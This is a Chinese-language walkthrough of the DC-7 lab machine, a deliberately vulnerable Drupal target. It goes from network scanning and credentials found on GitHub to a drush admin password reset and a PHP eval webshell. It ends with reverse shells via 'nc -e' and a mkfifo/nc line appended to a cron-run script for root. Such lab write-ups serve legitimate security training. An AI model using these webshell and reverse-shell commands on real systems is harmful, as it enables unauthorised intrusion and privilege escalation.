Vulhub 靶场 DC-7解析

一、环境搭建

kali的靶攻击机IP地址：192.168.200.14

DC-7靶机的IP地址：暂时未知

注意：靶机和攻击机应处于一个网卡下

通过MAC地址判断靶机DC-7的IP 地址

二、信息收集

1、探索网段内存活的主机

第一种方式：

arp-scan -l

1707095923_65c03773b9d21675191a4.png!small?1707095925152

第二种方式：

nmap -T4 -sP 192.168.200.0/24 -oN nmap200.sP

1707095931_65c0377b7685e161d3947.png!small?1707095932845

第三种方式：

netdiscover -i eth0 -r 192.168.200.0/24 #eth0代表网卡  -r代表网段

1707095942_65c037860904bedf75375.png!small?1707095943740

2、扫描站点开放的端口信息

nmap -p 1-65535 192.168.200.10

1707095950_65c0378e0b67b335682b3.png!small?1707095951229

开放的端口有80端口和22端口

3、扫描目录

1707095961_65c03799ae41c587b03c8.png!small?1707095962660

1707095966_65c0379e74381d6716eb6.png!small?1707095967376

1707095972_65c037a41df212d4ebd44.png!small?1707095973221

1707095978_65c037aa177d4e5e2ecfc.png!small?1707095979286

4、网站指纹

第一种方式，可以安装火狐插件

第二种方式，在kali当中执行命令

whatweb -v 192.168.200.10

登陆网站，通过火狐插件可以知道网站使用的CMS是Drupal

1707095987_65c037b3c5290b57c05b9.png!small?1707095988846

当然，可以看到网站欢迎界面的英文信息

DC-7引入了一些“新”概念，但我让你来弄清楚它们是什么。：-）
虽然这个挑战并不完全是技术性的，但如果你需要诉诸暴力或字典攻击，你可能不会成功。
你要做的就是跳出框框思考。
盒子外面的路。：-）  #可知口令爆破是行不通的

三、漏洞测试

社工手段

百度搜索账户名

1707095996_65c037bc60d3432aaf621.png!small?1707095997414

是github账户，点击进入

1707096006_65c037c608cef18c76a62.png!small?1707096006945

可以看到全是配置文件，然后从底部的英文翻译可以知道，找对地方了

1707096015_65c037cf77d6fc4bc1a6c.png!small?1707096016629

1707096022_65c037d6aff18d47b7cb8.png!small?1707096023705

得到数据库账户密码

账户名：dc7user
密码：MdR3xOgB7#dW
数据库名：Staff

1707096032_65c037e08e471ccc61a04.png!small?1707096033512

几个可能的突破点：

1 网站首页的搜索框，尝试直接查询passwd等文件或直接输入linux命令查看，都以失败收尾；

2 尝试扫描网站目录，没发现什么有价值的目录，倒是发现了robotx.txt文件，这个文件作为常见的可以让爬虫程序扫描的文件之一，控制是否想让爬虫去爬取本站信息；

3 对于robots.txt文件，对里面的目录或者文件都进行了访问查看，未发现有用的信息

1707096041_65c037e9ccb75e650e319.png!small?1707096043131

没啥有用的，从刚才的账号密码入手进行ssh连接，登陆成功之后，看看home目录下有什么其他账户的文件夹

ssh dc7user@192.168.200.10

1707096050_65c037f24f2b3740442ca.png!small?1707096051552

发现一个backups文件夹和一个mbox文件

进入backups文件夹，发现两个文件，但都是以gpg结尾的，gpg命令是用来加密文件的，加密后的文件都是乱码

1707096059_65c037fb8e4613613de7e.png!small

1707096075_65c0380bba3c2060ee19c.png!small?1707096077267

进入mbox中发现脚本文件的路径

1707096084_65c038141a2b538570d0c.png!small?1707096085162

dc7user@dc-7:~$ cd /opt/scriptsdc7user@dc-7:/opt/scripts$ cat backups.sh

主要信息：

Shell脚本文件 /opt/scripts/backups.sh

数据库文件：/home/dc7user/backups/website.sql

网站数据： /home/dc7user/backups/website.tar.gz

1707096093_65c0381dbb0a1955d607d.png!small?1707096095230

drush user-password admin --password="new_pass" 
#想要更改您的密码？就这么简单。
#记得执行命令前先切换到Drupal的目录下面。
cd /var/www/html/
#Drupal默认账户是admin  123456为我修改的密码。
drush user-password admin --password="123456"

网页都会存在一个admin账户，也可以在网页的登录界面进行尝试，提示修改成功

1707096101_65c03825c4dee161e0175.png!small?1707096102730

来到网站后台，使用admin/123456登录网站，成功登录

http://192.168.200.10/user/login

1707096110_65c0382e1eb22dccafd99.png!small?1707096111153

在Content—>Add content–>Basic page下，准备添加PHP代码反弹shell，但发现Drupal 8不支持PHP代码，百度后知道Drupal 8后为了安全，需要将php单独作为一个模块导入

php介绍页面如下，模块包下载地址

https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz

依次点击

1707096126_65c0383e1fbd1f9f988f2.png!small?1707096127270

安装完之后，跳转，然后点击激活

1707096138_65c0384ae1c1fcc6c6f81.png!small?1707096139900

1707096145_65c0385104e3c8bc11863.png!small?1707096146062

1707096151_65c038572566cb9339972.png!small?1707096152250

对该页面进行编辑，添加一句话PHP代码，并保存为PHP代码

<?php
@eval($POST[123]);
?>

1707096160_65c038603e6931241dfda.png!small?1707096161521

欢迎页面是网站的首页，所以直接使用中国蚁剑连接网站，成功连接getshell

1707096169_65c038694af0983d03afc.png!small?1707096170533

反弹SHELL

习惯性的反弹了一次shell到kali，在这里不反弹shell到kali下面也可以在蚁剑虚拟终端上做下面步骤

在kali监听6666端口，并反弹shell到kali，切换shell外壳

nc -e /bin/bash 192.168.200.14 6666
nc -lvvp 6666
python -c 'import pty;pty.spawn("/bin/bash")'

1707096177_65c038719a4d6b944d5b9.png!small?1707096178786

当前用户是www-data，在/opt/scripts目录下的backups.sh脚本文件所属组是www-data，所以www-data用户可以对这个脚本文件进行操作，并且这个脚本文件定时执行可以利用它来反弹shell

1707096184_65c03878c71e4672650a6.png!small?1707096185739

提权

写入反弹shell代码到backups.sh脚本文件中，并在kali监听8899端口，等待计划任务执行，稍微等待后成功getshell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.200.14 8899 >/tmp/f" >> backups.shnc -lvvp 8899

1707096191_65c0387fea647e8028fb7.png!small?1707096193124

# 记得kali也要开启侦听

nc -lvvp 8899

等待之后…

1707096200_65c03888a9077763bfb6b.png!small?1707096202307

获得flag

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://xiahunao.cn/news/2807319.html

如若内容造成侵权/违法违规/事实不符，请联系瞎胡闹网进行投诉反馈，一经查实，立即删除！